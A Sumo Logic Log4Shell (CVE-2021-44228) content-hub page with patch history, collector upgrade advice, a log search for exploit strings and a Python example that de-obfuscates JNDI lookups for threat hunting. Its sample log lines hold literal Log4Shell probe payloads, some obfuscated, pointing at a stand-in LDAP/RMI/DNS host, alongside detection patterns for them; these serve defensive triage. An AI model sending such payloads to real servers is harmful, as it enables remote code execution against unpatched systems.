Welcome to Sumo Logic’s content hub for the Log4Shell vulnerability with Apache Log4j. You will find our latest updates and assets on this ongoing and developing issue.
Sumo Logic update on Apache Log4j
Was Sumo Logic exploited or the service impacted?
For the initial Log4Shell vulnerability through the two subsequent CVEs, our security and engineering teams have confirmed Sumo Logic was NOT exploited and our Sumo Logic Service was never impacted.
What should Sumo Logic customers do?
We recommend all customers upgrade their Installed Collectors to this latest version (19.375-4) immediately.
How can I search for Log4j using Sumo Logic?
For queries and a deeper technical dive on hunting for this activity, check out our Log4Shell CVE-2021-44228 Situational Awareness Brief.
Determining if you’re affected
- If you use the Apache Log4j library anywhere in your organization, compare the version you run against the Apache Log4j project’s published security guidance and update to the latest fixed release to address the recent vulnerabilities.
- Our Content team is actively working on developing dashboards/searches for customers to leverage to help identify potential cases of compromise within their environment.
- Using your Sumo Logic platform, here is a common search you can use to find current variants of the exploit string (including the obfuscated forms that attackers use to split the word jndi), which may help you identify attempts in your own environment:
("jndi:" or "{lower:j" or "{upper:j" or "-j}" or ":-j%7") | parse regex "(?<jndi_string>\$\{(?:\$\{[^\}])?j\}?(?:\$\{[^\}])?n\}?(?:\$\{[^\}])?d\}?(?:\$\{[^\}])?i.*?:}?[^,;\"\\]+}?)[\\\";,]" nodrop
- For a deeper technical dive on hunting for this activity, check out our Log4Shell CVE-2021-44228 Situational Awareness Brief.
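The search above works in two stages: a cheap keyword prefilter (the scope clause) followed by a pattern that pulls the JNDI string out of the matching lines. The following is an added example, not Sumo Logic’s code, that reimplements those two stages in Python and goes a step further than the page’s regex: it collapses the ${lower:}, ${upper:} and ":-" default-value lookups and the partial URL encoding that obfuscated probes rely on, so the canonical ${jndi:scheme:target} string is recovered for triage. The log lines, IP addresses and the JNDI_CANON/normalize names are constructed for the example and are not from the page or from real traffic.

```python
import re
from urllib.parse import unquote

# Constructed sample lines (not captured traffic): one plain Log4Shell probe,
# three obfuscated probes, one partially URL-encoded probe, one benign line
# that legitimately mentions "jndi:", and one ordinary request.
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:08:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.6 - - [10/Dec/2021:08:02:12 +0000] "GET /login HTTP/1.1" 200 512 "-" "${${lower:j}ndi:rmi://203.0.113.7:1099/x}"',
    '10.0.0.7 - - [10/Dec/2021:08:02:13 +0000] "GET /?q=${${::-j}${::-n}${::-d}${::-i}:dns://203.0.113.7/z} HTTP/1.1" 404 0 "-" "curl/7.79.1"',
    '10.0.0.8 - - [10/Dec/2021:08:02:14 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NaN:-j}ndi:${lower:l}dap://203.0.113.7/u}"',
    '10.0.0.9 - - [10/Dec/2021:08:02:15 +0000] "GET /?x=${${::-j%7Dndi:ldap://203.0.113.7/e%7D HTTP/1.1" 200 512 "-" "curl/7.79.1"',
    'INFO  [main] javax.naming.InitialContext - looked up jndi:comp/env/jdbc/appDS',
    '10.0.0.10 - - [10/Dec/2021:08:02:16 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

# Same keyword prefilter as the search's scope clause, applied case-insensitively.
PREFILTER_TERMS = ("jndi:", "{lower:j", "{upper:j", "-j}", ":-j%7")

# An innermost ${...}: a body that contains no nested "${" and no "}".
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")

# Canonical form we want after normalization: ${jndi:<scheme>:<target>}
JNDI_CANON = re.compile(r"\$\{jndi:([a-z]+):([^}\s\"]+)\}", re.I)


def is_candidate(line: str) -> bool:
    """Stage 1: cheap substring prefilter, mirroring the search scope."""
    low = line.lower()
    return any(term in low for term in PREFILTER_TERMS)


def _resolve(body: str):
    """Evaluate one innermost lookup the way Log4j 2.x does for the lookups
    attackers use to split the word 'jndi'. Returns None to leave a lookup in
    place (the jndi: lookup itself, or anything we do not model)."""
    low = body.lower()
    if low.startswith("jndi:"):
        return None
    if low.startswith("lower:"):
        return body[len("lower:"):].lower()
    if low.startswith("upper:"):
        return body[len("upper:"):].upper()
    # ${::-j}, ${env:NaN:-j}, ${sys:nope:-j} ... all fall back to the default after ":-"
    if ":-" in body:
        return body.split(":-", 1)[1]
    return None


def normalize(text: str, max_rounds: int = 16) -> str:
    """Undo URL encoding, then collapse innermost lookups until nothing changes."""
    text = unquote(text)
    for _ in range(max_rounds):
        changed = False

        def repl(m):
            nonlocal changed
            out = _resolve(m.group(1))
            if out is None:
                return m.group(0)
            changed = True
            return out

        text = INNER_LOOKUP.sub(repl, text)
        if not changed:
            break
    return text


def hunt(lines):
    """Stage 2: for each prefiltered line, return
    (index, canonical_jndi_string, scheme, target) per JNDI string found."""
    hits = []
    for i, line in enumerate(lines):
        if not is_candidate(line):
            continue
        for m in JNDI_CANON.finditer(normalize(line)):
            hits.append((i, m.group(0), m.group(1).lower(), m.group(2)))
    return hits


if __name__ == "__main__":
    for idx, canon, scheme, target in hunt(SAMPLE_LOGS):
        print(f"line {idx}: {scheme:<5} {target:<24} {canon}")
```

The benign line passes the prefilter (it contains "jndi:") but produces no hit because there is no ${jndi:...} lookup in it, which is why the search keeps a second, stricter parse stage rather than alerting on the keywords alone. The normalizer only models the lookups named in the prefilter; a payload built from lookups it does not model will keep its ${...} wrapper after normalization and is still worth inspecting by hand.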
How Sumo Logic mitigates this vulnerability
What steps have been taken?
- Beginning early in the morning on Dec. 10th, Sumo Logic’s security team investigated and validated the nature and severity of the exploit against potential points of compromise and determined that at NO time was Sumo Logic exploited.
- We use a custom SumoLog4Layout library that never invokes Log4j lookups (the ${...} substitution on logged messages that Log4Shell abuses and that the stock Apache Log4j layouts perform), so the Sumo Logic Service was never impacted.
- Sumo Logic’s Installed Collector is designed not to evaluate anything in the data it receives from the internet. Further, the logging we use Log4j for in the collector is for internal audit purposes only, so this never posed any significant risk. As a precaution, we released an updated Installed Collector on Dec. 11th with Log4j v2.15.0 in case the situation escalated. With the discovery of CVE-2021-45046, we updated the collector on Dec. 16th with Log4j v2.16.0. With the discovery of CVE-2021-45105, we updated the collector on Dec. 19th with Log4j v2.17.0. On Dec. 29th we updated the collector with Log4j v2.17.1 to proactively protect against CVE-2021-44832.
- Sumo Logic remains in constant communication with our customers.
- Sumo Logic’s System Security and Global Operations Center teams continue to monitor this situation closely for any change in the nature of the vulnerability, methods of compromise, and detection bypass methods.
What should Sumo Logic customers do?
- On Dec. 29th we published a new version of our Installed Collector, release 19.375-4, which has been updated to leverage Log4j v2.17.1 and address the vulnerability related to CVE-2021-44832. We recommend all customers upgrade their Installed Collectors to this latest version immediately.
- Please stay up to date with our latest releases to ensure any potential undiscovered or undisclosed issues in prior Log4j versions are not exploitable.
- Sumo Logic’s Customer Support team is following up directly with customers on known vulnerable versions to ensure all customers get to a secure/safe version as soon as possible.
- If you have any questions, please contact us at support@sumologic.com
Do I have to upgrade my Sumo Logic collectors?
Yes, we highly recommend you update your Sumo Logic Installed Collector. Sumo Logic’s Installed Collector is designed not to evaluate anything in the data it receives from the internet. Further, the logging we use Log4j for in the collector is for internal audit purposes only, so these vulnerabilities never posed any significant risk. As a precaution, we have released four updates (as of 12/29/2021) to our Installed Collector to pick up the patched Log4j releases the Apache Software Foundation has published.
What is Log4Shell?
What’s the difference between Log4Shell and Log4j?
How is Log4j exploited?
Who is affected?
You’re not alone
EXISTING CUSTOMERS
We understand this is likely an extremely stressful time for you and your security team. If you’re a Sumo Logic customer, we want to assure you that our account team is standing by and ready to help. For any additional technical questions or concerns, please open a case with Sumo Logic Support by contacting them via email, or submitting your request.
EVERYONE
If you’re not yet a Sumo Logic customer but would like to gain a better understanding of how we’re helping organizations navigate this and future challenges, please request your own free trial.